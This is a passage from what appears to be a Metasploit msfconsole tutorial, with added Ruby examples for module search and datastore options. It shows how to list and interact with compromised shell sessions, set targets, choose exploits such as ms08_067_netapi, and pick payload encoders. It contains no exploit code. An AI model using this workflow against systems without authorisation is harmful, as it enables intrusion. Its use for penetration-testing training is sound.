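def filter_match?(mod, key, value)
  case key
  when 'author'            then mod[:authors].any? { |a| a.downcase.include?(value) }
  when 'cve', 'bid', 'edb' then ref_match?(mod, key, value)
  when 'name'              then mod[:name].downcase.include?(value) ||
                                mod[:desc].downcase.include?(value)
  when 'platform'          then mod[:platform].downcase == value
  when 'ref'               then mod[:refs].any? { |r| r.downcase.include?(value) }
  when 'type'              then mod[:type] == value
  else false
  end
end

# Plain terms are case-insensitive regexes over name, description and refs;
# a term that is not a valid regex falls back to a literal match.
def term_match?(mod, term)
  haystack = [mod[:name], mod[:desc], *mod[:refs]].join("\n")
  re = begin
    Regexp.new(term, Regexp::IGNORECASE)
  rescue RegexpError
    Regexp.new(Regexp.escape(term), Regexp::IGNORECASE)
  end
  haystack.match?(re)
end

# All filters and all terms must match (AND), as with msfconsole's search.
def search(query, modules = MODULES)
  filters, terms = parse_query(query)
  modules.select do |m|
    filters.all? { |k, v| filter_match?(m, k, v) } &&
      terms.all? { |t| term_match?(m, t) }
  end.map { |m| m[:name] }
end

if $PROGRAM_NAME == __FILE__
  ['cve:2011 author:jduck platform:linux', 'usermap_script', 'MS09-050',
   'type:post', 'name:mysql'].each do |q|
    puts "#{q.ljust(40)} => #{search(q).inspect}"
  end
end
```

    Because the plain term is a regex, a query like MS09-050 hits the bulletin reference even though the module name uses underscores, which is the point the note about hyphens versus underscores is making.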

    sessions command

    The sessions command lets you list, interact with, and kill spawned sessions. The sessions can be shells, Meterpreter sessions, VNC, etc.

    msf > sessions -h
    Usage: sessions [options] or sessions [id]
    
    Active session manipulation and interaction.
    
    OPTIONS:
    
        -C   Run a Meterpreter Command on the session given with -i, or all
        -K        Terminate all sessions
        -c   Run a command on the session given with -i, or all
        -h        Help banner
        -i   Interact with the supplied session ID
        -k   Terminate sessions by session ID and/or range
        -l        List all active sessions
        -q        Quiet mode
        -r        Reset the ring buffer for the session given with -i, or all
        -s   Run a script on the session given with -i, or all
        -t   Set a response timeout (default: 15)
        -u   Upgrade a shell to a meterpreter session on many platforms
        -v        List sessions in verbose mode
        -x        Show extended information in the session table
    
    Many options allow specifying session ranges using commas and dashes.
    For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6
    

    To list any active sessions, pass the -l option to sessions.

    msf exploit(3proxy) > sessions -l
    
    Active sessions
    ===============
    
      Id  Description    Tunnel
      --  -----------    ------
      1   Command shell  192.168.1.101:33191 -> 192.168.1.104:4444
    

    To interact with a given session, you just use the -i switch followed by the Id number of the session.

    msf exploit(3proxy) > sessions -i 1
    [*] Starting interaction with 1...
    
    C:\WINDOWS\system32>
    

    set command

    The set command lets you configure framework options and parameters for the current module you are working with.

    msf auxiliary(ms09_050_smb2_negotiate_func_index) > set RHOST 172.16.194.134
    RHOST => 172.16.194.134
    msf auxiliary(ms09_050_smb2_negotiate_func_index) > show options
    
    Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST  172.16.194.134   yes       The target address
       RPORT  445              yes       The target port
       WAIT   180              yes       The number of seconds to wait for the attack to complete.
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Windows Vista SP1/SP2 and Server 2008 (x86)
    

    Metasploit also lets you set an encoder to use at run time. This is particularly useful in exploit development when you are not sure which payload encoding methods will work with a given exploit.

    msf  exploit(ms09_050_smb2_negotiate_func_index) > show encoders
    
    Compatible Encoders
    ===================
    
       Name                    Disclosure Date  Rank       Description
       ----                    ---------------  ----       -----------
       generic/none                             normal     The "none" Encoder
       x86/alpha_mixed                          low        Alpha2 Alphanumeric Mixedcase Encoder
       x86/alpha_upper                          low        Alpha2 Alphanumeric Uppercase Encoder
       x86/avoid_utf8_tolower                   manual     Avoid UTF8/tolower
       x86/call4_dword_xor                      normal     Call+4 Dword XOR Encoder
       x86/context_cpuid                        manual     CPUID-based Context Keyed Payload Encoder
       x86/context_stat                         manual     stat(2)-based Context Keyed Payload Encoder
       x86/context_time                         manual     time(2)-based Context Keyed Payload Encoder
       x86/countdown                            normal     Single-byte XOR Countdown Encoder
       x86/fnstenv_mov                          normal     Variable-length Fnstenv/mov Dword XOR Encoder
       x86/jmp_call_additive                    normal     Jump/Call XOR Additive Feedback Encoder
       x86/nonalpha                             low        Non-Alpha Encoder
       x86/nonupper                             low        Non-Upper Encoder
       x86/shikata_ga_nai                       excellent  Polymorphic XOR Additive Feedback Encoder
       x86/single_static_bit                    manual     Single Static Bit
       x86/unicode_mixed                        manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
       x86/unicode_upper                        manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    

    unset command

    The opposite of the set command is, of course, unset. unset removes a parameter previously configured with set. You can remove all assigned variables with unset all.

    msf > set RHOSTS 192.168.1.0/24
    RHOSTS => 192.168.1.0/24
    msf > set THREADS 50
    THREADS => 50
    msf > set
    
    Global
    ======
    
      Name     Value
      ----     -----
      RHOSTS   192.168.1.0/24
      THREADS  50
    
    msf > unset THREADS
    Unsetting THREADS...
    msf > unset all
    Flushing datastore...
    msf > set
    
    Global
    ======
    
    No entries in data store.
    
    msf >
    

    setg command

    To save a lot of typing during a pentest, you can set global variables within msfconsole. You do this with the setg command. Once they have been set, you can use them in as many exploit and auxiliary modules as you like. You can also save them for use the next time you start msfconsole. The pitfall, however, is forgetting that you have saved globals, so always check your options before you run an exploit. Conversely, you can use the unsetg command to unset a global variable. In the examples that follow, variables are entered in all capitals (i.e. LHOST), but Metasploit is case-insensitive, so this is not necessary.

    msf > setg LHOST 192.168.1.101
    LHOST => 192.168.1.101
    msf > setg RHOSTS 192.168.1.0/24
    RHOSTS => 192.168.1.0/24
    msf > setg RHOST 192.168.1.136
    RHOST => 192.168.1.136
    

    After setting your various variables, you can run the save command to save your current environment and settings. Once saved, they are loaded automatically on startup, which spares you from having to set everything again.

    msf > save
    Saved configuration to: /root/.msf4/config
    msf >
    
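    The interaction between set, setg, unset all, unsetg and save is the part of the datastore that causes the pitfall mentioned above (a required option silently filled in by a forgotten global). The following is an added Ruby example, not Metasploit's datastore implementation: it resolves an option the way the "Current Setting" column shows it (module-local value, then global, then the module default), offers a preflight check that reports required options that are empty or that come only from a global, and saves and reloads globals in a constructed key=value format, which is not a claim about the layout of /root/.msf4/config. The option names and sample values are taken from the ms09_050 listing on this page.

```ruby
require 'tmpdir'

class Datastore
  # Option definitions as a module would declare them.
  Option = Struct.new(:name, :default, :required, :description)

  def initialize(global = {})
    @global = global   # set with setg, shared by every module
    @local  = {}       # set with set, belongs to the current module
  end

  # Option names are case-insensitive, as the text notes for LHOST.
  def set(name, value)
    @local[name.upcase] = value.to_s
  end

  def setg(name, value)
    @global[name.upcase] = value.to_s
  end

  def unset(name)
    @local.delete(name.upcase)
  end

  def unset_all
    @local.clear
  end

  def unsetg(name)
    @global.delete(name.upcase)
  end

  # Resolution order: module-local, then global, then the option's default.
  def lookup(name, options)
    key = name.upcase
    return @local[key] if @local.key?(key)
    return @global[key] if @global.key?(key)
    opt = options.find { |o| o.name.upcase == key }
    opt && opt.default
  end

  # Rows of the `show options` table: name, current setting, required, description.
  def show_options(options)
    options.map do |o|
      [o.name, lookup(o.name, options), o.required ? 'yes' : 'no', o.description]
    end
  end

  # The check the text recommends before running: which required options are
  # still empty, and which are only satisfied by a (possibly saved) global.
  def preflight(options)
    result = { missing: [], from_global: [] }
    options.each do |o|
      next unless o.required
      key = o.name.upcase
      next if @local.key?(key)
      if @global.key?(key)
        result[:from_global] << key
      elsif o.default.nil?
        result[:missing] << key
      end
    end
    result
  end

  # Persist globals only, in a constructed key=value layout (not msfconsole's format).
  def save(path)
    File.open(path, 'w') do |f|
      f.puts '[globals]'
      @global.sort.each { |k, v| f.puts "#{k}=#{v}" }
    end
    path
  end

  def self.load(path)
    globals = {}
    File.foreach(path) do |line|
      line = line.strip
      next if line.empty? || line.start_with?('[', '#')
      k, v = line.split('=', 2)
      globals[k.upcase] = v.to_s
    end
    new(globals)
  end
end

if $PROGRAM_NAME == __FILE__
  opts = [Datastore::Option.new('RHOST', nil, true, 'The target address'),
          Datastore::Option.new('RPORT', '445', true, 'The target port')]
  ds = Datastore.new
  ds.setg('rhost', '192.168.1.136')          # a global fills the required option
  ds.show_options(opts).each { |row| puts row.join('  ') }
  puts ds.preflight(opts).inspect            # RHOST reported as from_global
end
```

    A preflight result with a non-empty from_global list is exactly the situation the text warns about: the option looks set in show options, but the value came from a global that may have been saved in an earlier session.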

    show command

    Entering show at the msfconsole prompt displays every module within Metasploit.

    msf > show
    
    Encoders
    ========
    
       Name                    Disclosure Date  Rank       Description
       ----                    ---------------  ----       -----------
       cmd/generic_sh                           good       Generic Shell Variable Substitution Command Encoder
       cmd/ifs                                  low        Generic ${IFS} Substitution Command Encoder
       cmd/printf_php_mq                        manual     printf(1) via PHP magic_quotes Utility Command Encoder
    ...snip...
    

    There are a number of show commands you can use, but the ones you will use most frequently are show auxiliary, show exploits, show payloads, show encoders, and show nops.

    auxiliary modules

    Executing show auxiliary displays a listing of all of the available auxiliary modules within Metasploit. As mentioned earlier, auxiliary modules include scanners, denial of service modules, fuzzers, and more.

    msf > show auxiliary
    Auxiliary
    =========
    
       Name                                                  Disclosure Date  Rank    Description
       ----                                                  ---------------  ----    -----------
       admin/2wire/xslt_password_reset                       2007-08-15       normal  2Wire Cross-Site Request Forgery Password Reset Vulnerability
       admin/backupexec/dump                                                  normal  Veritas Backup Exec Windows Remote File Access
       admin/backupexec/registry                                              normal  Veritas Backup Exec Server Registry Access
    ...snip...
    
    exploits modules

    Naturally, show exploits will be the command you are most interested in, since at its core Metasploit is all about exploitation. Run show exploits to get a listing of all the exploits contained in the framework.

    msf > show exploits
    
    Exploits
    ========
    
       Name                                                           Disclosure Date  Rank       Description
       ----                                                           ---------------  ----       -----------
       aix/rpc_cmsd_opcode21                                          2009-10-07       great      AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
       aix/rpc_ttdbserverd_realpath                                   2009-06-17       great      ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
       bsdi/softcart/mercantec_softcart                               2004-08-19       great      Mercantec SoftCart CGI Overflow
    ...snip...
    
    Using MSFconsole Payloads

    Running show payloads displays all of the different payloads for every platform available within Metasploit.

    msf > show payloads
    
    Payloads
    ========
    
       Name                                             Disclosure Date  Rank    Description
       ----                                             ---------------  ----    -----------
       aix/ppc/shell_bind_tcp                                            normal  AIX Command Shell, Bind TCP Inline
       aix/ppc/shell_find_port                                           normal  AIX Command Shell, Find Port Inline
       aix/ppc/shell_interact                                            normal  AIX execve shell for inetd
    ...snip...
    
    payloads modules

    As you can see, there are a lot of payloads available. Fortunately, when you are in the context of a particular exploit, running show payloads only displays the payloads that are compatible with that exploit. For instance, if it is a Windows exploit, you will not be shown the Linux payloads.

    msf  exploit(ms08_067_netapi) > show payloads
    
    Compatible Payloads
    ===================
    
       Name                                             Disclosure Date  Rank    Description
       ----                                             ---------------  ----    -----------
       generic/custom                                                    normal  Custom Payload
       generic/debug_trap                                                normal  Generic x86 Debug Trap
       generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
    ...snip...
    
    options

    If you have selected a specific module, you can issue the show options command to display which settings are available and/or required for that module.

    msf exploit(ms08_067_netapi) > show options
    
    Module options:
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST                     yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Targeting
    
    targets

    If you are not sure whether an operating system is vulnerable to a particular exploit, run the show targets command from within the context of the exploit module to see which targets are supported.

    msf  exploit(ms08_067_netapi) > show targets
    
    Exploit targets:
    
       Id  Name
       --  ----
       0   Automatic Targeting
       1   Windows 2000 Universal
       10  Windows 2003 SP1 Japanese (NO NX)
       11  Windows 2003 SP2 English (NO NX)
       12  Windows 2003 SP2 English (NX)
    ...snip...
    
    advanced

    If you wish to fine-tune an exploit further, you can see the more advanced options by running show advanced.

    msf exploit(ms08_067_netapi) > show advanced
    
    Module advanced options:
    
       Name           : CHOST
       Current Setting:
       Description    : The local client address
    
       Name           : CPORT
       Current Setting:
       Description    : The local client port
    
    ...snip...
    
    encoders

    Running show encoders displays a listing of the encoders that are available within MSF.

    msf > show encoders
    Compatible Encoders
    ===================
    
       Name                    Disclosure Date  Rank       Description
       ----                    ---------------  ----       -----------
       cmd/generic_sh                           good       Generic Shell Variable Substitution Command Encoder
       cmd/ifs                                  low        Generic ${IFS} Substitution Command Encoder
       cmd/printf_php_mq                        manual     printf(1) via PHP magic_quotes Utility Command Encoder
       generic/none                             normal     The "none" Encoder
       mipsbe/longxor                           normal     XOR Encoder
       mipsle/longxor                           normal     XOR Encoder
       php/base64                               great      PHP Base64 encoder
       ppc/longxor                              normal     PPC LongXOR Encoder
       ppc/longxor_tag                          normal     PPC LongXOR Encoder
       sparc/longxor_tag                        normal     SPARC DWORD XOR Encoder
       x64/xor                                  normal     XOR Encoder
       x86/alpha_mixed                          low        Alpha2 Alphanumeric Mixedcase Encoder
       x86/alpha_upper                          low        Alpha2 Alphanumeric Uppercase Encoder
       x86/avoid_utf8_tolower                   manual     Avoid UTF8/tolower
       x86/call4_dword_xor                      normal     Call+4 Dword XOR Encoder
       x86/context_cpuid                        manual     CPUID-based Context Keyed Payload Encoder
       x86/context_stat                         manual     stat(2)-based Context Keyed Payload Encoder
       x86/context_time                         manual     time(2)-based Context Keyed Payload Encoder
       x86/countdown                            normal     Single-byte XOR Countdown Encoder
       x86/fnstenv_mov                          normal     Variable-length Fnstenv/mov Dword XOR Encoder
       x86/jmp_call_additive                    normal     Jump/Call XOR Additive Feedback Encoder
       x86/nonalpha                             low        Non-Alpha Encoder
       x86/nonupper                             low        Non-Upper Encoder
       x86/shikata_ga_nai                       excellent  Polymorphic XOR Additive Feedback Encoder
       x86/single_static_bit                    manual     Single Static Bit
       x86/unicode_mixed                        manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
       x86/unicode_upper                        manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    
    nops

    Finally, issuing the show nops command displays the NOP generators that Metasploit has to offer.

    msf > show nops
    NOP Generators
    ==============
    
       Name             Disclosure Date  Rank    Description
       ----             ---------------  ----    -----------
       armle/simple                      normal  Simple
       mipsbe/better                     normal  Better
       php/generic                       normal  PHP Nop Generator
       ppc/simple                        normal  Simple
       sparc/random                      normal  SPARC NOP Generator
       tty/generic                       normal  TTY Nop Generator
       x64/simple                        normal  Simple
       x86/opty2                         normal  Opty2
       x86/single_byte                   normal  Single Byte
    

    use command

    When you have decided on a particular module to make use of, issue the use command to select it. The use command changes your context to that module, exposing type-specific commands. Notice in the output below that any global variables set previously are already configured.

    msf > use dos/windows/smb/ms09_001_write
    msf auxiliary(ms09_001_write) > show options
    
    Module options:
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST                   yes       The target address
       RPORT  445              yes       Set the SMB service port
    
    msf auxiliary(ms09_001_write) >
    

    Whenever you need help, the msfconsole help command can be used to display the available options.
